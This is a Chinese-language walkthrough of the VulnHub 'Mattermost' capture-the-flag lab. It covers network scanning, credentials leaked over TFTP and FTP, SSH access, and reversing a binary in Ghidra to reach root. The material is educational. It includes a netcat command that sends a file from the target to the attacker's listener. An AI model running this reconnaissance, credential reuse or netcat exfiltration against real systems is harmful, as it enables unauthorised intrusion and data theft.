vulnhub之mattermost的实践

访客 307 0
本文来源:

今天实践的是vulnhub的mattermost镜像,下载地址,

https://download.vulnhub.com/enumbox/Mattermost.7z,

用workstation导入成功,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之mattermost的实践-第1张图片-网盾网络安全培训

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.53,


vulnhub之mattermost的实践-第2张图片-网盾网络安全培训

浏览器访问一下http://192.168.137.53:8065,需要用户名密码登录,

vulnhub之mattermost的实践-第3张图片-网盾网络安全培训

接下来的事情就比较尴尬了,竟然想到可能有udp的tftp服务,

扫描一下,真有,sudo nmap -sU -p 69 192.168.137.53,

vulnhub之mattermost的实践-第4张图片-网盾网络安全培训

登录,下载文件,tftp 192.168.137.53,

get README.md

quit

cat README.md

得到了用户名密码,Admin/ComplexPassword0!,登录8065的界面,

找到一个zoom插件的地方,使能插件后,得到一个url,

vulnhub之mattermost的实践-第5张图片-网盾网络安全培训

访问这个url,http://192.168.137.53/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html,

得到新的用户名密码,ftpuser/ftppassword,登录ftp,

ftp 192.168.137.53

ftpuser

ftppassword

dir

cd users

dir

cd mattermost

dir

get message

bye

cat message

又获取到新的用户名密码,mattermost/Welcome!!!,

这回能ssh登录,登录进去后发现了提示信息,但执行文件说key过期,

ls

cd Desktop

ls

cat README.md

./secret

vulnhub之mattermost的实践-第6张图片-网盾网络安全培训

想办法把secret文件搞出来,kali攻击机上nc -nlvp 1234 > secret,

靶机上,cat secret | nc 192.168.137.141 1234,

kali攻击机上安装反编译软件ghidra,

sudo apt update,sudo apt install ghidra,

cd /usr/share/ghidra,./ghidraRun,

反编译得到key,0xf447,转成10进制,62535,

vulnhub之mattermost的实践-第7张图片-网盾网络安全培训

这回再执行文件,输入正确的key,id一下确认是root,

vulnhub之mattermost的实践-第8张图片-网盾网络安全培训

标签: vulnhub

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~